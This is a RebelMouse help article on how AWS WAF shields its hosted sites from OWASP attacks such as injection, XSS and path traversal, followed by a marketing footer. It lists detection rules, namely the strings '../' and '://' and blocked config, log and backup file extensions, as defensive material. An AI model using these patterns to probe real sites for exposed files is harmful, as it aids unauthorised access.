Understanding AWS’s Web Application Firewall for Server Protection

Understanding AWS’s Web Application Firewall for Server Protection

Amazon Web Services's (AWS) Web Application Firewall (WAF) is a firewall that helps protect your web applications (or APIs) against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives RebelMouse developers control over how traffic reaches our applications by enabling us to create security rules that block common attack patterns, such as SQL injections or cross-site scripting (XSS), and rules that filter out specific traffic patterns we have defined. These rules are regularly updated when new issues emerge as well.


With AWS WAF, we're making sure that all our sites are covered against some of the most common attacks , as defined by The Open Web Application Security Project (OWASP). The project is an online community that creates freely available articles, methodologies, documentation, tools, and technologies in the field of web application security.

Possible Common Attacks

Injections: Injection flaws allow attackers to relay malicious code through an application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to back-end databases via SQL (e.g., SQL injection). Whole scripts written in Perl, Python, and other languages can be injected into poorly designed applications and executed. Any time an application uses an interpreter of any type, there is a danger of introducing an injection vulnerability.

For example, if somebody tries to inject some JavaScript into your site, we can block this automatically to avoid the insert.

Protection for Cross-Site Scripting: Cross-site scripting flaws occur when web applications include user-provided data in webpages that are sent to the browser without proper sanitization. If the data isn't properly validated or escaped, an attacker can use these vectors to embed scripts, inline frames (iframes), or other objects into the rendered page. These, in turn, can be used for a variety of malicious purposes, including stealing user credentials by using keyloggers, to install system malware. The impact of the attack is magnified if that user data persists server side in a data store, and then is delivered to a large set of other users.

Consider the example of a common, but popular, blog that accepts user comments. If user comments aren't correctly sanitized, a malicious user can embed a malicious script in the comments, such as:

The code then gets executed anytime a legitimate user loads that blog article.

Broken Access Control: This category of application flaw covers the lack of, or improper enforcement of, restrictions on what authenticated users are allowed to do. AWS WAF can filter dangerous HTTP request patterns that can indicate path traversal attempts, or remote and local file inclusion (RFI/LFI). AWS WAF validates if HTTP request components contain ../ or ://.

This helps us avoid malicious attackers exploiting vulnerabilities, including when a user can access some resource or perform some action that they are not supposed to be able to access.

How AWS WAF Protects Our Servers From Attacks

Insufficient Attack Protection: AWS WAF enforces a level of hygiene for inbound HTTP requests. Size constraint conditions help to build rules that ensure that components of HTTP requests fall within specifically defined ranges. We can use these rules to avoid processing abnormal requests. An example is to limit the size of URIs or query strings to values that make sense to our application.

In our case, we're limiting the URI and QUERY_STRING bytes.

Using Components With Known Vulnerabilities: AWS WAF filters and blocks HTTP requests to the functionality of components that are not in use in applications. This helps reduce the attack surface of those components if vulnerabilities are discovered in functionality you're not using.

AWS WAF matches URIs to filenames that end with:

  • .cfg
  • .conf
  • .config
  • .ini
  • .log
  • .bak
  • .backup

The HTTP request component:

  • URI

We're setting up a mechanism to mitigate known vulnerabilities in components that addresses the lifecycle of such components. We identify and track the dependencies of our application, as well as the dependencies of the underlying components. This way, we can monitor the processes in place to track the security of these components.

Robots.txt Crawl-Delay Directive: Aside from the AWS WAF protection mechanisms, we have also included a directive into our default robots.txt files called crawl-delay.

The crawl-delay directive is meant to communicate to crawlers to slow down crawling in order to not overload the web server. On our pages, we have it set to 0.1 seconds. This is the default setting for our robots.txt file. Clients can override the crawl-delay directive in our Layout & Design Tool , and if you have already made manual changes to your file previously, we recommend that you check and add this manually. You can also modify the crawl-delay for you.

Overall, this server protection allows us to automatically block repeated requests to our sites so that we can identify malicious attacks and block them right away. Based on what code is returned, you will be able to tell why the requests were blocked:

  • 429: Too many requests have been made.
  • 406: The status code for OWASP risks.
    • The response message will contain a code that matches a specific type of vulnerability. We use another set of codes to hide our protection logic from public users, but are able to share with you what each one means as needed. The following screenshot shows how this looks:

If you have any questions, please reach out to your account manager or email us at support@rebelmouse.com , and we'll help you solve your particular use case.

What Is RebelMouse?
Request a Proposal

Where
Websites Are Built

The Fastest Sites in the World Run on RebelMouse

Let’s Chat

new!

RebelMouse Performance Monitoring

Real-Time Core Web Vitals

Get Started
DISCOVER MORE

Our Core Features

Our platform is a complete digital publishing toolbox that's built for modern-day content creators, and includes game-changing features such as our:

Why RebelMouse?

Unprecedented Scale

RebelMouse sites reach more than 120M people a month, with an always-modern solution that combines cutting-edge technology with decades of media savvy. And due to our massive scale, 1 in 3 Americans have visited a website powered by RebelMouse.

120M+ Users
550M+ Pageviews
17+ Avg. Minutes per User
6+ Avg. Pages per User

Today's Top Websites Use RebelMouse

Thanks to the tremendous scale of our network, we are able to analyze a wealth of traffic data that informs our strategies and allows us to be a true strategic partner instead of just a vendor.

What Clients Say

We’re here to help you weigh and understand every tech and strategic decision that affects your digital presence. Spend less time managing everything yourself, and more time focused on creating the quality content your users deserve.

Case Studies

A Team Built Like No Other

RebelMouse employs a unique, diverse, and decentralized team that consists of 70+ digital traffic experts across more than 25 different countries. We have no central office, and we cover every time zone to ensure that we’re able to deliver amazing results and enterprise-grade support around the clock.

Our team is well-versed in all things product, content, traffic, and revenue, and we strategically deploy ourselves to help with each element across all of our clients. We thrive on solving the complex.

Let's Chat